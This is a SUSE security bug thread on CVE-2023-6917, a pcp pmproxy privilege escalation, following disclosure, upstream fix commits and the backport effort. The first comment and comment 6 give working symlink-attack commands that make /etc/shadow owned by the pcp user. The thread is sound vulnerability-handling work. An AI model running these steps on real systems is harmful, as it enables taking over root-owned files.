Bug 1217826 (CVE-2023-6917)

Summary: VUL-0: CVE-2023-6917: pcp: Local privilege escalation from pcp user to root in /usr/libexec/pcp/lib/pmproxy
Product: [Novell Products] SUSE Security Incidents Reporter: Johannes Segitz <jsegitz>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: IN_PROGRESS --- QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: camila.matos, ddiss, martin.schreiner, matthias.gerstner, security-team
Version: unspecifiedFlags: camila.matos: needinfo? (martin.schreiner)
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/387125/
Whiteboard: CVSSv3.1:SUSE:CVE-2023-6917:6.7:(AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Johannes Segitz 2023-12-05 15:57:48 UTC
/usr/libexec/pcp/lib/pmproxy has
254             # create directory housing daemon pid file
255             if [ ! -d "$PCP_RUN_DIR" ]
256             then
257                 mkdir -p -m 775 "$PCP_RUN_DIR"
258                 chown $PCP_USER:$PCP_GROUP "$PCP_RUN_DIR"
259                 if which restorecon >/dev/null 2>&1
260                 then
261                     restorecon -r "$PCP_RUN_DIR"
262                 fi
263             fi
264             # create directory which will serve as cwd
265             if [ ! -d "$RUNDIR" ]
266             then
267                 mkdir -p -m 775 "$RUNDIR"
268                 chown $PCP_USER:$PCP_GROUP "$RUNDIR"
269             fi

this file is executed as root. $PCP_RUN_DIR is /var/log/pcp/pmproxy by default.
/var/log/pcp/ is writeable for pcp, so the user can manipulate the service to chown arbitrary file to him. POC:

sh-5.2$ id
uid=453(pcp) gid=453(pcp) groups=453(pcp)
sh-5.2$ pwd
//var/log/pcp
sh-5.2$ ./exploit  . /etc/shadow pmproxy
[+] watching .
[!] unlink() of pmproxy failed: No such file or directory

Now as root restart the service with systemctl restart pmproxy

After that:
sh-5.2$ ls -lah /etc/shadow
-rw-r----- 1 pcp pcp 1.2K Dec  5 16:48 /etc/shadow

The exploit is basically a quicker version of 
rm -rf pmproxy; inotifywait .; rm -r pmproxy; ln -s /etc/shadow pmproxy

the inotifywait waits until the file is created by the mkdir command in line 257. Then it tries to delete the directory and prepare a symlink in time. In shell that's rather unreliable, but with the C version that works almost 100%.

Suggestions:
- Other services run as user pcp, then the problem goes away. Is this possible here?
- If not: does /var/log/pcp need to be owned by pcp?
Comment 4 Matthias Gerstner 2023-12-08 10:05:27 UTC
Adding OBS bugowner of pcp as well to the bug. I have a very similar finding
in bug 1217783. It is obvious that pcp has no proper user separation model.
The pcp user and group are only existing on paper. I will approach upstream
about both findings and ask them to redesign this.
Comment 5 Matthias Gerstner 2023-12-12 11:34:16 UTC
Upstream has already released version 6.1.1 while we are still with version
5.3.7 in Factory. This vulnerability is still found in the current upstream
sources, though.
Comment 6 Matthias Gerstner 2023-12-12 14:40:40 UTC
(In reply to jsegitz@suse.com from comment #0)
> 
> this file is executed as root. $PCP_RUN_DIR is /var/log/pcp/pmproxy by default.
> /var/log/pcp/ is writeable for pcp, so the user can manipulate the service to chown arbitrary file to him. POC:
> 
> sh-5.2$ id
> uid=453(pcp) gid=453(pcp) groups=453(pcp)
> sh-5.2$ pwd
> //var/log/pcp
> sh-5.2$ ./exploit  . /etc/shadow pmproxy
> [+] watching .
> [!] unlink() of pmproxy failed: No such file or directory
> 
> Now as root restart the service with systemctl restart pmproxy

Similar to my own finding in bug 1217783, this doesn't even need to win a race
condition. The shell code does not check any error situations. If the `mkdir`
fails then the `chown` happens anyway. So you can simply do:

    pcp$ cd /var/log/pcp
    pcp$ rm -r pmproxy
    pcp$ ln -s /etc/shadow pmproxy

And wait for the service to start.
Comment 7 Martin Schreiner 2023-12-12 18:55:32 UTC
Thanks for adding me here, Matthias.

I'm double-checking this with you folks, will get back as soon as I have anything solid.
Comment 8 Matthias Gerstner 2023-12-13 09:53:04 UTC
I just sent a detailed email about this issue and bug 1217783 to the upstream
maintainers, offering coordinated disclosure. I will post any further
developments here.
Comment 9 Martin Schreiner 2023-12-14 13:19:46 UTC
Perfect, thanks Matthias!
Comment 10 Matthias Gerstner 2023-12-15 14:54:26 UTC
The report to upstream resulted in a rather large email recipient list
involving a number of Red Hat people also from their security team. There have
been different opinions about whether this is severe enough to warrant a CVE
and/or an embargo.

Nathan Scott representing upstream is serious about fixing these issues and
redesigning the scripts' privileges. It will likely take until about mid of
Februrary though, for when a new version release is planned.

The discussion about a CVE assignment also has been completed by now: It seems
like Red Hat will assign one.

Whether we will have an embargo is still not fully clear but I think so. For us
there will not be much left to do likely until around mid of February when the
update becomes available.
Comment 12 Matthias Gerstner 2023-12-20 10:19:32 UTC
Red Hat security assigned the CVE found in the bug's summary to the issue.

There is likely not much going to happen for the next couple of weeks due to
the holiday season.

We will use this CVE for both this bug and bug 1217783.
Comment 13 Martin Schreiner 2024-01-02 16:01:35 UTC
Thanks for the updates, Matthias.
Comment 18 Matthias Gerstner 2024-02-15 12:37:26 UTC
The PR# is already public and merged and mentions security, so it is already
half-public at least. There are no reference to the CVE public yet though.
Comment 20 Martin Schreiner 2024-02-21 21:20:24 UTC
Matthias, do you think we should wade through that PR with 130 commits and try to locate the fix, exactly? https://github.com/performancecopilot/pcp/pull/1873

We might be able to patch SLE that way.
Comment 21 David Disseldorp 2024-02-21 23:12:28 UTC
(In reply to Matthias Gerstner from comment #19)
> Communication with upstream proves to de difficult. Now it sounds like they
> never considered an embargo and coordinates release in the first place. I
> have
> no new information about the publication status.

Nathan is on vacation at the moment.

> I'm dropping the EMBARGOED tag for the moment but keep the bug private until
> we know more. The CVE has not been published anyway yet.

Makes sense.
Comment 22 Matthias Gerstner 2024-02-22 09:30:11 UTC
(In reply to martin.schreiner@suse.com from comment #20)
> Matthias, do you think we should wade through that PR with 130 commits and try to locate the fix, exactly? https://github.com/performancecopilot/pcp/pull/1873
> 
> We might be able to patch SLE that way.

If such an isolated fix exists at all. I fear rather that this is a larger
redesign to repair the privilege separation model.

I can have a look into the changes but it will take some time since I'm busy
with other topics other the moment.
Comment 23 Matthias Gerstner 2024-02-26 15:04:44 UTC
Nathan upstream responded by now. From his side everything is pulibc since Feb
15th. I am now working on formally publishing our report and the two VUL-0
bugs. I will also look a bit more closely into the bugfix pull-request to see
if I can identify something sensible to document as a bugfix for this to the
public.
Comment 24 Matthias Gerstner 2024-02-27 10:39:39 UTC
I took the time to iterate over all 130 (!) commits that are part of the
upstream security PR# to identify the portions we need for bugfixing.

Despite the large number of commits the actual lines of codes changed by them
are not that large luckily. Still it is a bigger redesign that happens here to
harmonize the permissions setup in pcp. A lot of commits are only concerned
with QA logic that is also stored in the repository as well with some
packaging specific logic (e.g. tarball creation in the buildsystem) and with
more exotic platforms like OpenBSD or very old Linux distributions.

The following list of commits is what I extracted as being relevant for fixing
the issue, in chronological order. Quite a number of commits are actually
follow-up fixes. Looking at the accumulated diff for these commits in Git adds
up to a patchset of about ~4.000 lines. For some of the commits I'm not sure
if we will need them in our context e.g. the runaspcp command from commit
1b10f43 is likely not needed but I still mentioned it.

d068763d11149f6b80c72ee9678c3d0259d96c6c: run most everything as pcp:pcp
c1244a683e868295790033c6f7efa2617d0d7abd: fixes for systemd for the previous patch plus refactoring
b30a5308e8b63796c2aa6f32f08e44a5dfe82d5e: fix directory permissions
982f421c7d26c72da1929ae5d360bac0f513e76a: fix for old systems using runuser; can likely be skipped
2ab22817e83b279287674370553061d418a77727: adds a new library API __pmCleanMapDir() complete with QA and man page; likely needed for the rest of the fixes.
a95eb3d1251a7962297531034dabe5f844fe598c: use new __pmCleanMapDir() in daemons to simplify init scripts
7d9d036df399c0ea443d7b0f3c7ce2594cf2db7b: change dir ownership
d29aef236d9a96488501c938b791a55ebf4cea23: fix typo in group ownership
6c61e8cc25544eddd31d358db777e196530cdc0b: move logfile rotation handling from shell scripts into the daemons
16a8df32fb3bef67941829f41a41af90594830f0: fix bug in __pmCleanMapDir() introduced above
c693d9c4542d3ce77178a85e8c4cff25aeda0504: use systemd-tmpfiles.d for creation of /run/pcp
2467e50c15cbe424d58f2b78974379415bda2611: drop logfile rotation from init script which is now done in daemon code
1b10f43fdccadaa20862d711d6440cecef63fbc2: runaspcp fallback method if no setpriv etc. is available. likely not needed by us.
41cc018ad8f63ab2f12aece9315ebdd74f336b9e: some additions to the systemd-tmpfiles.d change, don't hardcode user/group
e503fef687c0d211d3746d191965f81820b6ad2c: another tmpfiles fix
13d6d8145223d038a95fe9ab529338d90b7612c7: bugfix for older setpriv binaries, if needed then only on very old SLE
b97abbd618393b854fc6adce8ebb45515e15b00f: drop /run dir creation from init script
b445545f6f515544784f945941ec4356905faade: fix pcp user/group substitution during build in pmie_farm_check.service.in
6a6995800d179b516d159809cc50fb68cbd069d5: make sure no supplementary groups remain after privdrop
6936cd40eb191ee0355e09dcac372e5e04abd450: sets POSIXLY_CORRECT to fix some parameter passing issues from init scripts to setpriv/runuser; not sure if this is needed on Linux.
c3b42dbb791cf38e3cf25619580a99ca1a0f997b: better error messages and variable names in scripts, not strictly needed for the fix but could cause conflicts with later patches if not applied.
f959efb6481fed27450971d469576f8bb6241021: make sure /run directory exists in scripts that still run as root
19fff799df3a6bdc6229bd716e6e8d957d2f7604: new common init helper script to setup /run; could be seen as refactoring only, but could cause conflicts with later commits if not applied.
463582e58bef42e2fe13038466ad925396355356: fixup commit to 19fff
89c2d4ae35acfe07c44f6866194d56b5ddca0e7d: another fixup
5029ed606fc3fc4a350da332f426b2dfb7bad4fa: make sure dirs aren't created world-writeable in daemon code
283b560b1e17d9e014983423c817bf4d0148c40d: drop _reboot_setup() from init script which is now done in __pmCleanMapDir()
f28451aaee113d82ab53a4a70deade200d369818: further tweaks to sytemd-tmpfiles setup
197f85835eb33dc1f166970bfab9900040acd325: and more tweaks to systemd-tmpfiles
35600595ce95375e50c319074e97056b64cb378e: reboot-init script use mktemp for tempdir
a026cbb7179f45a1c91c0efd00f557ab9ea8d595: fixup to using mktemp
66658b7e64b6e52484273c4b5c0b5372a66786f1: no longer create & chown logfile dir in shell script
Comment 25 Matthias Gerstner 2024-02-27 10:47:07 UTC
Make the bug public, the embargo has ended on 2024-02-15 already.
Comment 26 Martin Schreiner 2024-02-29 12:33:40 UTC
Thank you Matthias, I'll try building with these patches, possibly not merging 1b10f43.
Comment 27 Martin Schreiner 2024-03-12 16:58:11 UTC
So I've been trying to build pcp with all of these patches/commits on top of it, and I'm doing thorough work to backport it to 5.2.5.

If I'm unable to produce any valuable results this week, until March 15, I'll push for a full upgrade on Tumbleweed and SLE, up to version 6.2.0, if possible.
Comment 28 Matthias Gerstner 2024-03-13 09:30:24 UTC
(In reply to martin.schreiner@suse.com from comment #27)
> If I'm unable to produce any valuable results this week, until March 15, I'll push for a full upgrade on Tumbleweed and SLE, up to version 6.2.0, if possible.

I will clearly support this, if necessary. It doesn't make sense to invest
weeks of working time for this with questionable results.
Comment 29 Martin Schreiner 2024-03-19 15:55:08 UTC
So I couldn't backport this fix to 5.2.5.

The changes are simply too drastic for a compatible patch. The patch I did get was fairly sizable (176KB, 5581 lines), but compilation fails, and every path I've investigated arrives at similar results.

I'm now pushing for 6.2.0 to be upgraded on Factory, and then we can determine if that release is API/ABI compatible with the versions provided on SLE.
Comment 30 Martin Schreiner 2024-03-28 13:47:11 UTC
Ok, I have 6.2.0 building for SLE-12, SLE-15 and Factory.
Comment 31 Martin Schreiner 2024-04-03 14:54:55 UTC
6.2.0 submitted to the devel project, together with a fix for bsc#1222121:
https://build.opensuse.org/request/show/1164379
Comment 35 Martin Schreiner 2024-06-28 00:43:51 UTC
I'm reassigning this bug to security, as the appropriate SRs have already been submitted.

Feel free to reassign to me if need be, or get in touch directly.